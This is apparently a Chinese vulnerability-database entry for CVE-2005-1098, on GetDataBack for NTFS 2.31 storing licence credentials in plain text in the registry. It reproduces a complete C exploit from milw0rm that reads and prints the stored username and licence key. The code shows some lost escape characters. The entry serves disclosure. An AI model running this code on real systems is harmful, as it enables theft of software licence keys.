GetDataBack给本地用户证书漏洞

GetDataBack给本地用户证书漏洞

漏洞ID 1108610 漏洞类型 未知
发布时间 2005-04-04 更新时间 2005-05-02
图片[1]-GetDataBack给本地用户证书漏洞-安全小百科CVE编号 CVE-2005-1098
图片[2]-GetDataBack给本地用户证书漏洞-安全小百科CNNVD-ID CNNVD-200505-070
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/912
https://www.securityfocus.com/bid/90121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-070
|漏洞详情
NTFS2.31的GetDataBack以纯文本形式在License注册表键的Name值中存储用户名和许可证密钥,从而使本地用户可以获取敏感信息。
|漏洞EXP
/*****************************************************************

GetDataBack for NTFS v2.31 Local Exploit by Kozan

Application: GetDataBack for NTFS v2.31
Vendor: www.runtime.org - Runtime Software
Vulnerable Description: GetDataBack for NTFS v2.31 discloses licence
informaations ( username and key ) to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char username[BUFSIZE], key[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Runtime
Software\GetDataBackNT\License",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{

lRet = RegQueryValueEx( hKey, "Name", NULL, NULL,(LPBYTE) username,
&dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured!");
return 0;
}

lRet = RegQueryValueEx( hKey, "Key", NULL, NULL,(LPBYTE) key, &dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured!");
return 0;
}
RegCloseKey( hKey );

printf("GetDataBack for NTFS v2.31 Local Exploit by Kozann");
printf("Credits to ATmaCAn");
printf("www.netmagister.com - www.spyinstructors.comn");
printf("[email protected]");
printf("Username: %sn",username);
printf("Key : %sn",key);

}
else{
printf("GetDataBack for NTFS v2.31 is not installed on your system!n");
}

return 0;
}

// milw0rm.com [2005-04-04]
|受影响的产品
Runtime Software Getdataback For Ntfs 2.31
|参考资料

来源:XF
名称:getdataback-ntfs-information-disclosure(19967)
链接:http://xforce.iss.net/xforce/xfdb/19967
来源:OSVDB
名称:15210
链接:http://www.osvdb.org/15210
来源:SECTRACK
名称:1013644
链接:http://securitytracker.com/id?1013644

相关推荐: Debian Reportbug Multiple Information Disclosure Vulnerabilities

Debian Reportbug Multiple Information Disclosure Vulnerabilities 漏洞ID 1097088 漏洞类型 Configuration Error 发布时间 2005-02-28 更新时间 2005-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享